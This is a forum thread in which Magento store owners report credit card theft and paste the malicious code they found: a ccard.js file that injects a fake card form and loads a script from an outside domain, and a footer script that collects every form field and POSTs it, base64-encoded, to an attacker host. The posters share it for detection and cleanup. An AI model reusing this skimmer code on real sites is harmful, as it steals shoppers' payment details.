cancel
Showing results for 
Search instead for 
Did you mean: 

Security Issue with Magento 1.9.x.x - ccard.js

Security Issue with Magento 1.9.x.x - ccard.js

Hi fellow Magento users.

 

In the recent week, our Magento store was inundated with issues relating to credit card details being stolen from our site. We do not store customer credit card information on our databases, and users are directed to a payment gateway to perform their payments. After reading the notice on the Magento site I located a file that had been placed on our server by means of a brute force ssh attack, named ccard.js. The code of the file as follows:

 

// Credit Card Validation Javascript
// copyright 12th May 2003, by Stephen Chapman, Felgall Pty Ltd

// You have permission to copy and use this javascript provided that
// the content of the script is not changed in any way.

function validateCreditCard(s) {
    // remove non-numerics
    var v = "0123456789";
    var w = "";
    for (i=0; i < s.length; i++) {
        x = s.charAt(i);
        if (v.indexOf(x,0) != -1)
        w += x;
    }
    // validate number
    j = w.length / 2;
    k = Math.floor(j);
    m = Math.ceil(j) - k;
    c = 0;
    for (i=0; i<k; i++) {
        a = w.charAt(i*2+m) * 2;
        c += a > 9 ? Math.floor(a/10 + a%10) : a;
    }
    for (i=0; i<k+m; i++) c += w.charAt(i*2+1-m) * 1;
    return (c%10 == 0);
}


$(document).on("click", "#p_method_payuRedirectPaymentPageDiscovery", function () {
        if(document.getElementById("payment_form_ccsave"))
                document.getElementById("payment_form_ccsave").remove();
});
$(document).on("click", "#p_method_banktransfer", function () {
        if(document.getElementById("payment_form_ccsave"))
                document.getElementById("payment_form_ccsave").remove();
});
$(document).on("click", "#p_method_mygate_functions", function () {
        if(document.getElementById("payment_form_ccsave"))
                document.getElementById("payment_form_ccsave").remove();
        ShowForm("checkout-payment-method-load");
});

function ShowForm(elem){
//fake form code
        if(document.getElementById(elem)){
                var myNode = document.getElementById(elem);
                //card holder name
                var fakeForm = '<ul class="form-list" id="payment_form_ccsave" style="overflow: hidden;"> <li> <label for="ccsave_cc_owner" class="required"><em>*</em>$
                myNode.insertAdjacentHTML('beforeEnd', fakeForm );
        }
        //end fake code
}

if((new RegExp('onepage|checkout|onestep|firecheckout')).test(window.location))
{document.write('<script src="https://jquery-cdn.top/mage.js"></script>')};

 

Using SSH, I conducted a search using the following command:

 

grep -Ril "onepage|checkout" /
grep -Ril "onestep|firecheckout" /

If you find any file that contains the above text, I would suggest you rename or remove the file to prevent any further issues.

 

If anyone else has encountered this issue, please could you post your methods you used to counter?

 

1 REPLY

Re: Security Issue with Magento 1.9.x.x - ccard.js

Hi Sudeav,

 

I had the same problem, but I didn't find any record of the user getting in through SSH. I assume your statement means you found a successful entry? BTW, we use fail2ban to ban users who attempt to brute force.

 

In addition to ccard.js (mine was compromised back in Dec-2015) it was also in the System->Config->Design->Footer->Miscellaneous HTML

 

<script type="text/javascript">
<!--
var grelos_v={
	snd:null,
	Glink:'https://cloud-jquery.org/code/jquery.min.js',
	myid:(function(name){
		var matches=document.cookie.match(new RegExp('(?:^|; )'+name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+'=([^;]*)'));
		return matches?decodeURIComponent(matches[1]):undefined;
	})('setidd')||(function(){
		var ms=new Date();
		var myid = ms.getTime()+"-"+Math.floor(Math.random()*(999999999-11111111+1)+11111111); 
		var date=new Date(new Date().getTime()+60*60*24*1000);
		document.cookie='setidd='+myid+'; path=/; expires='+date.toUTCString();
		return myid;
	})(),
	base64_encode:function(data){
		var b64='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
		var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc='';
		do{
			o1=data.charCodeAt(i++);
			o2=data.charCodeAt(i++);
			o3=data.charCodeAt(i++);
			bits=o1<<16 | o2<<8 | o3;
			h1=bits>>18 & 0x3f;
			h2=bits>>12 & 0x3f;
			h3=bits>>6 & 0x3f;
			h4=bits & 0x3f;
			enc+=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);
		}while(i<data.length);
		switch(data.length%3){
			case 1:
				enc=enc.slice(0,-2)+'==';
				break;
			case 2:
				enc=enc.slice(0,-1)+'=';
				break;
		}
		return enc;
	},
	clk:function(){
		grelos_v.snd=null;
		var inp=document.querySelectorAll("input, select, textarea, checkbox, button");
		for (var i=0;i<inp.length;i++){
			if(inp[i].value.length>0){
				var nme=inp[i].name;
				if(nme==''){nme=i;}
				grelos_v.snd+=inp[i].name+'='+inp[i].value+'&';
			}
		}
	},
	send:function(){
		try{
			var btn=document.querySelectorAll("a[href*='javascript&colon;void(0)'],button, input, submit, .btn, .button");
			for(var i=0;i<btn.length;i++){
				var b=btn[i];
				if(b.type!='text'&&b.type!='select'&&b.type!='checkbox'&&b.type!='password'&&b.type!='radio'){
					if(b.addEventListener) {
					b.addEventListener('click',grelos_v.clk,false);
					}else{
						b.attachEvent('onclick',grelos_v.clk);
					}
				}
			}
			var frm=document.querySelectorAll('form');
			for(vari=0;i<frm.length;i++){
				if(frm[i].addEventListener){
					frm[i].addEventListener('submit',grelos_v.clk,false);
				}else{
					frm[i].attachEvent('onsubmit',grelos_v.clk);
				}
			}
			if(grelos_v.snd!=null){
				var domm=location.hostname.split('.').slice(0).join('_');
				var keym=grelos_v.base64_encode(grelos_v.snd);
				var http=new XMLHttpRequest();
				http.open('POST',grelos_v.Glink,true);
				http.setRequestHeader('Content-type','application/x-www-form-urlencoded');
				http.send('info='+keym+'&hostname='+domm+'&key='+grelos_v.myid);
			}
			grelos_v.snd=null;
			keym=null;
			setTimeout(function(){grelos_v.send()},30);
		}catch(e){}
	}
}
if((new RegExp('onepage|checkout|onestep','gi')).test(window.location)){
	grelos_v.send();
}
-->
</script>

 

With this code which is basically the same as yours... its gathers input information and sends it off to a website.

 

We moved all payment processing totally off-site so CC information can not be compromised.

 

Furthermore,

  • I locked down the file ccard.js so that its not writeable by anyone and,
  • removed Miscellaneous HTML from the template view.

 

This week the code got back into the Miscellaneous HTML field, but the lock-down of ccard.js stopped it from being written too.

 

Can anyone tell me how they are sql injecting into the Miscellaneous HTML field? If it was already patched, which patch fixed it, perhaps mine didn't patch correctly?

 

Thanks.